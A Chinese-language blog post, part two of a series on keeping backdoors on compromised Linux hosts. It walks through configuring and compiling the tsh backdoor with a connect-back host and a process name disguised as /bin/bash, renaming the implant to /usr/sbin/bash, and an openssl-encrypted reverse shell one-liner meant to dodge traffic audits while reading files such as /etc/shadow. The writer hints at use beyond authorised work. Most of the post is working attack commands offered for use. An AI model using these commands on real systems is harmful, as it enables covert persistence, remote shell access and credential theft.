Linux后门维系（二）

先推荐下我最喜欢的Linux后门系列文章，在我的收藏夹里藏了好久了，来自奇安信的公众号。

《红队实战攻防技术分享：Linux后门总结-SSH利用篇》
https://mp.weixin.qq.com/s/-F_Ol-J-QfynOCYfD1nG3Q
《红队实战攻防技术分享：Linux后门总结-各类隐藏技能》
https://mp.weixin.qq.com/s/B5cam9QN8eDHFuaFjBD34Q
《红队实战攻防技术分享：Linux后门总结-系统服务利用》
https://mp.weixin.qq.com/s/bXhtAApF5NuK0Ed-0Tq2nA

不管是工作中还是、、工作中，其实吃下的Linux并不多，确切的说都是因为各种低权限。在这里简单分享下最近的相关笔记，方便日后查看。

TSH

第一次听到大佬们提tsh，我是懵逼的，查了下才知道是更新止于七年前的Linux后门工具，失敬失敬。

项目地址：https://github.com/orangetw/tsh

工作原因，这里只提反向连接的方式：

git clone https://github.com/orangetw/tsh.git

修改tsh.h文件，尤其是secret、CONNECT_BACK_HOST参数，即密钥和控制端地址，另端口SERVER_PORT和连接延时CONNECT_BACK_DELAY可自行设置或默认，默认延时单位为秒。

#ifndef _TSH_H
#define _TSH_H

char *secret = "1q2w3e4r";

#define SERVER_PORT 7586
#define FAKE_PROC_NAME "/bin/bash"

#define CONNECT_BACK_HOST  "x.x.x.x"
#define CONNECT_BACK_DELAY 30

#define GET_FILE 1
#define PUT_FILE 2
#define RUNSHELL 3

#endif /* tsh.h */

然后选择对应系统编译即可，make

#
linux、freebsd、openbsd、netbsd、cygwin、sunos、irix、hpux、osf

ls
aes.c  aes.h  compile.sh  Makefile  pel.c  pel.h  README.md  sha1.c  sha1.h  tsh.c  tshd.c  tsh.h
make linux
ls
aes.c  aes.h  compile.sh  Makefile  pel.c  pel.h  README.md  sha1.c  sha1.h  tsh  tsh.c  tshd  tshd.c  tsh.h

可以看到编译生成了tsh文件和tshd文件：

控制端cb开启监听：

chmod u+x tsh
./tsh cb

被控端直接运行：

chmod u+x tshd
./tshd

后门上线，且会在会话退出后沿着原来的时间点每隔30s主动发起一次链接，且表现较为稳定。可以再加点表面掩饰，如将tshd修改为bash上传到/usr/sbin/bash路径。

tsh体积极小，且自带延时策略，我们可以摆脱对定时任务的依赖了；而且tsh自带流量加密，不管是工作还是、、emmmm、工作中保护客户隐私都更加安全。

openssl流量加密反弹shell

这个其实之前也知道，单习惯性更多的还是bash直接反弹，但考虑到目标网络流量审计的情况，对于如/etc/shadow等敏感文件的读取，还是采用流量加密为好，一并记录。

#生成证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
#服务端监听
openssl s_server -quiet -key key.pem -cert cert.pem -port 443
#客户端反弹
mkfifo /tmp/z; /bin/bash -i < /tmp/z 2>&1 | openssl s_client -quiet -connect x.x.x.x:443 > /tmp/z; rm -rf /tmp/z